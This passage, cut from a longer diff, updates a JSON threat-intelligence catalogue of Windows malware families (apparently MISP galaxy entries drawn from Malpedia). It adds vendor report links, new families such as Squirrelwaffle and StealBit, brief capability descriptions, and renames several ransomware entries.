"https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/" @@ -28539,39 +32552,48 @@ "value": "SmartEyes" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", - "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" + "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html" ], "synonyms": [], "type": [] }, "uuid": "b81cbf03-8909-4833-badf-4df32c9bf6cb", - "value": "SMAUG Ransomware" + "value": "SMAUG" }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", + "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", + "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html", "https://hatching.io/blog/tt-2020-08-27/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", @@ -28580,6 +32602,7 @@ "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", @@ -28587,9 +32610,11 @@ "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/" + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://x0r19x91.in/malware-analysis/smokeloader/" ], "synonyms": [ "Dofoil", @@ -28619,7 +32644,7 @@ "value": "Smominru" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", @@ -28630,7 +32655,7 @@ "type": [] }, "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", - "value": "Smrss32 Ransomware" + "value": "Smrss32" }, { "description": "", @@ -28650,27 +32675,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", - "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", - "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", - "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", - "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", - "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", - "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", - "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/", + "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://twitter.com/bad_packets/status/1270957214300135426", "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", + "https://www.goggleheadedhacker.com/blog/post/22", + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", + "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", - "https://twitter.com/milkr3am/status/1270019326976786432", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", + "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", - "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + "https://twitter.com/bad_packets/status/1270957214300135426", + "https://twitter.com/milkr3am/status/1270019326976786432" ], "synonyms": [ "EKANS", @@ -28679,7 +32706,7 @@ "type": [] }, "uuid": "547deef9-67c3-483e-933d-171ee8b6b918", - "value": "Snake Ransomware" + "value": "Snake" }, { "description": "Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.", @@ -28687,8 +32714,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch", "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/", + "https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", "https://twitter.com/VK_Intel/status/1191414501297528832" @@ -28737,6 +32766,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", + "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/", "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html" ], "synonyms": [ @@ -28806,6 +32838,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars", "https://twitter.com/VK_Intel/status/1201584107928653824", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/" ], @@ -28847,10 +32880,11 @@ "value": "SocksBot" }, { - "description": "", + "description": "This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can either happen via a raw TCP socket or a HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf" ], "synonyms": [ @@ -28885,9 +32919,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", - "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" + "https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer", + "https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/", + "https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html", + "https://twitter.com/MsftSecIntel/status/1403461397283950597", + "https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire", + "https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/", + "https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/" + ], + "synonyms": [ + "Jupyter", + "Polazert", + "Yellow Cockatoo" ], - "synonyms": [], "type": [] }, "uuid": "4e08d816-9fe3-42ae-b7e4-f7182445f304", @@ -28898,6 +32943,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat", + "https://blogs.blackberry.com/en/2021/05/threat-thursday-sombrat-always-leave-yourself-a-backdoor", "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" ], "synonyms": [], @@ -29041,6 +33087,21 @@ "uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755", "value": "Sparksrv" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door", + "https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" + ], + "synonyms": [ + "FamousSparrow" + ], + "type": [] + }, + "uuid": "412a1b1b-77b1-4149-b7bd-14a43aa40dda", + "value": "SparrowDoor" + }, { "description": "Spartacus is ransomware written in .NET and emerged in the first half of 2018. ", "meta": { @@ -29110,20 +33171,39 @@ "uuid": "34e9d701-22a1-4315-891d-443edd077abf", "value": "SpyBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", + "https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bcee00e4-5316-45ad-8811-33c50b9394f8", + "value": "Spyder" + }, { "description": "SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the \"The Next Zeus Malware\". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", - "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/" + "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals" ], "synonyms": [], "type": [] @@ -29131,6 +33211,29 @@ "uuid": "814fa0b7-0468-4ed0-b910-2b3caec96d44", "value": "SpyEye" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle", + "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", + "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", + "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/", + "https://www.cynet.com/understanding-squirrelwaffle/", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://twitter.com/Max_Mal_/status/1442496131410190339", + "https://security-soup.net/squirrelwaffle-maldoc-analysis/", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", + "https://www.youtube.com/watch?v=9X2P7aFKSw0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cdbfd973-fa96-4e64-b2a3-9d51460fd7af", + "value": "Squirrelwaffle" + }, { "description": "", "meta": { @@ -29270,11 +33373,42 @@ "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", "value": "StartPage" }, + { + "description": "Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog", + "https://twitter.com/ESETresearch/status/1433819369784610828", + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4a844c8c-996c-4562-bed4-0496d7838157", + "value": "STASHLOG" + }, + { + "description": "This is a stealer used by LockBit 2.0.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit", + "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/", + "https://twitter.com/r3c0nst/status/1425875923606310913" + ], + "synonyms": [ + "Corrempa" + ], + "type": [] + }, + "uuid": "b98c86d4-1eee-490e-a6f9-e9559322fec8", + "value": "StealBit" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", + "https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/", "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" ], "synonyms": [], @@ -29283,6 +33417,19 @@ "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", "value": "StealthWorker Go" }, + { + "description": "Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide", + "https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4729fb59-44a8-4d2f-9914-cd93fc528888", + "value": "SteamHide" + }, { "description": "", "meta": { @@ -29337,7 +33484,8 @@ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://securelist.com/keypass-ransomware/87412/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/" ], "synonyms": [ "Djvu", @@ -29346,7 +33494,7 @@ "type": [] }, "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", - "value": "STOP Ransomware" + "value": "STOP" }, { "description": "", @@ -29381,8 +33529,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity", "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", @@ -29411,10 +33561,12 @@ "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", + "https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001", "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf", "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" @@ -29445,6 +33597,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst", "https://www.brighttalk.com/webcast/7451/462719", + "https://us-cert.cisa.gov/remediating-apt-compromised-networks", "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", @@ -29460,6 +33613,7 @@ "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", "https://www.brighttalk.com/webcast/7451/469525", "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", @@ -29467,12 +33621,16 @@ "https://netresec.com/?b=211f30f", "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities", "https://twitter.com/megabeets_/status/1339308801112027138", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", "https://www.youtube.com/watch?v=cMauHTV-lJg", "https://twitter.com/0xrb/status/1339199268146442241", "https://netresec.com/?b=211cd21", "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", + "https://www.youtube.com/watch?v=dV2QTLSecpc", "https://github.com/RedDrip7/SunBurst_DGA_Decode", + "https://youtu.be/SW8kVkwDOrc?t=24706", "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", "https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714", "https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/", @@ -29484,14 +33642,17 @@ "https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update", "https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/", "https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f", + "https://github.com/cisagov/CHIRP", "https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q", "https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/", "https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html", - "https://www.4hou.com/posts/KzZR", + "https://www.cisa.gov/supply-chain-compromise", + "https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/", "https://www.comae.com/posts/sunburst-memory-analysis/", "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-077a", "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", "https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947", "https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs", @@ -29505,6 +33666,8 @@ "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/", "https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/", + "https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf", + "https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/", "https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf", @@ -29513,6 +33676,7 @@ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/", "https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling", "https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate", + "https://www.youtube.com/watch?v=-Vsgmw2G4Wo", "https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html", "https://www.youtube.com/watch?v=JoMwrkijTZ8", "https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar", @@ -29525,6 +33689,8 @@ "https://securelist.com/sunburst-backdoor-kazuar/99981/", "https://pastebin.com/6EDgCKxd", "https://www.youtube.com/watch?v=mbGN1xqy1jY", + "https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks", + "https://community.riskiq.com/article/9a515637", "https://www.solarwinds.com/securityadvisory/faq", "https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack", "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html", @@ -29539,6 +33705,7 @@ "https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/", "https://youtu.be/Ta_vatZ24Cs?t=59", "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.cadosecurity.com/post/responding-to-solarigate", "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", @@ -29551,9 +33718,11 @@ "https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q", "https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html", "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718", + "https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm", "https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/", "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", + "https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack", "https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/", "https://netresec.com/?b=2113a6a", 